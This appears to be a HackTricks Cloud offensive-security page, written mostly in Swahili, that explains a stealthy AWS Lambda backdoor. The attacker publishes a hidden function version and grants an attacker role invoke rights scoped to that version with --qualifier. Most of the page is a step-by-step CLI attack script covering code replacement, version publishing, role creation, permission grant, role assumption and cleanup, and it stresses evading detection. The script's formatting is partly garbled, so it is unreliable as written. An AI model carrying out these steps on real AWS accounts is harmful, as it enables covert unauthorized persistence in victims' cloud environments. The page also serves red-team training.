HackTricks CloudAWS - Lambda Alias-Scoped Resource Policy Backdoor (Invoke specific hidden version)
Tip
Jifunze na fanya mazoezi ya AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking:HackTricks Training GCP Red Team Expert (GRTE)
HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Angalia mpango wa usajili!
- Jiunge na đŹ kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter đŚ @hacktricks_live.
- Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.
Muhtasari
Unda toleo lililofichwa la Lambda lenye logic ya attacker na uweke resource-based policy kwa wigo wa toleo hilo maalum (au alias) ukitumia parameter --qualifier katika lambda add-permission. Toa tu lambda:InvokeFunction kwenye arn:aws:lambda:REGION:ACCT:function:FN:VERSION kwa attacker principal. Ita za kawaida kupitia jina la function au alias kuu hazitathiriwa, wakati attacker anaweza kuitisha moja kwa moja version ARN iliyobackdoor.
Hii ni ya kuficha zaidi kuliko kufichua Function URL na haiathiri alias kuu ya trafiki.
Ruhusa Zinazohitajika (attacker)
lambda:UpdateFunctionCode,lambda:UpdateFunctionConfiguration,lambda:PublishVersion,lambda:GetFunctionConfigurationlambda:AddPermission(to add version-scoped resource policy)iam:CreateRole,iam:PutRolePolicy,iam:GetRole,sts:AssumeRole(to simulate an attacker principal)
Attack Steps (CLI)
Chapisha toleo lililofichwa, ongeza ruhusa yenye wigo wa qualifier, ita kama attacker
```bash # Vars REGION=us-east-1 TARGET_FN=[Optional] If you want normal traffic unaffected, ensure a customer alias (e.g., âmainâ) stays on a clean version
aws lambda create-alias âfunction-name â$TARGET_FNâ âname main âfunction-version âregion â$REGIONâ
1) Build a small backdoor handler and publish as a new version
cat > bdoor.py <<PY import json, os, boto3
def lambda_handler(e, c): ident = boto3.client(sts).get_caller_identity() return {âhtâ: True, âwhoâ: ident, âenvâ: {âfnâ: os.getenv(AWS_LAMBDA_FUNCTION_NAME)}} PY zip bdoor.zip bdoor.py aws lambda update-function-code âfunction-name â$TARGET_FNâ âzip-file fileb://bdoor.zip âregion $REGION aws lambda update-function-configuration âfunction-name â$TARGET_FNâ âhandler bdoor.lambda_handler âregion $REGION until [ â$(aws lambda get-function-configuration âfunction-name â$TARGET_FNâ âregion $REGION âquery LastUpdateStatus âoutput text)â = âSuccessfulâ ]; do sleep 2; done VER=$(aws lambda publish-version âfunction-name â$TARGET_FNâ âregion $REGION âquery Version âoutput text) VER_ARN=$(aws lambda get-function âfunction-name â$TARGET_FN:$VERâ âregion $REGION âquery Configuration.FunctionArn âoutput text) echo âPublished version: $VER ($VER_ARN)â
2) Create an attacker principal and allow only version invocation (same-account simulation)
ATTACK_ROLE_NAME=ht-version-invoker aws iam create-role ârole-name $ATTACK_ROLE_NAME âassume-role-policy-document Version:2012-10-17 >/dev/null cat > /tmp/invoke-policy.json <<POL { âVersionâ: â2012-10-17â, âStatementâ: [{ âEffectâ: âAllowâ, âActionâ: [âlambda:InvokeFunctionâ], âResourceâ: [â$VER_ARNâ] }] } POL aws iam put-role-policy ârole-name $ATTACK_ROLE_NAME âpolicy-name ht-invoke-version âpolicy-document file:///tmp/invoke-policy.json
Add resource-based policy scoped to the version (Qualifier)
aws lambda add-permission
âfunction-name â$TARGET_FNâ
âqualifier â$VERâ
âstatement-id ht-version-backdoor
âaction lambda:InvokeFunction
âprincipal arn:aws:iam::$(aws sts get-caller-identity âquery Account âoutput text):role/$ATTACK_ROLE_NAME
âregion $REGION
3) Assume the attacker role and invoke only the qualified version
ATTACK_ROLE_ARN=arn:aws:iam::$(aws sts get-caller-identity âquery Account âoutput text):role/$ATTACK_ROLE_NAME CREDS=$(aws sts assume-role ârole-arn â$ATTACK_ROLE_ARNâ ârole-session-name htInvoke âquery Credentials âoutput json) export AWS_ACCESS_KEY_ID=$(echo $CREDS | jq -r .AccessKeyId) export AWS_SECRET_ACCESS_KEY=$(echo $CREDS | jq -r .SecretAccessKey) export AWS_SESSION_TOKEN=$(echo $CREDS | jq -r .SessionToken) aws lambda invoke âfunction-name â$VER_ARNâ /tmp/ver-out.json âregion $REGION >/dev/null cat /tmp/ver-out.json
4) Clean up backdoor (remove only the version-scoped statement). Optionally remove the role
aws lambda remove-permission âfunction-name â$TARGET_FNâ âstatement-id ht-version-backdoor âqualifier â$VERâ âregion $REGION || true
</details>
## Athari
- Hutoa backdoor ya siri ili kuwaita toleo lililofichwa la function bila kubadilisha alias kuu au kufichua Function URL.
- Inapunguza mfichuko kwa tu toleo/alias iliyobainishwa kupitia resource-based policy `Qualifier`, ikipunguza eneo la kugundua huku ikidumisha uwezo thabiti wa kuitwa kwa attacker principal.
> [!TIP]
> Jifunze na fanya mazoezi ya AWS Hacking:<img src="../../../../../images/arte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../../../images/arte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">\
> Jifunze na fanya mazoezi ya GCP Hacking: <img src="../../../../../images/grte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">[**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)<img src="../../../../../images/grte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">
> Jifunze na fanya mazoezi ya Azure Hacking: <img src="../../../../../images/azrte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">[**HackTricks Training Azure Red Team Expert (AzRTE)**](https://training.hacktricks.xyz/courses/azrte)<img src="../../../../../images/azrte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">
>
> <details>
>
> <summary>Support HackTricks</summary>
>
> - Angalia [**mpango wa usajili**](https://github.com/sponsors/carlospolop)!
> - **Jiunge na** đŹ [**kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuatilie** kwenye **Twitter** đŚ [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
> - **Shiriki mbinu za hacking kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
>
> </details>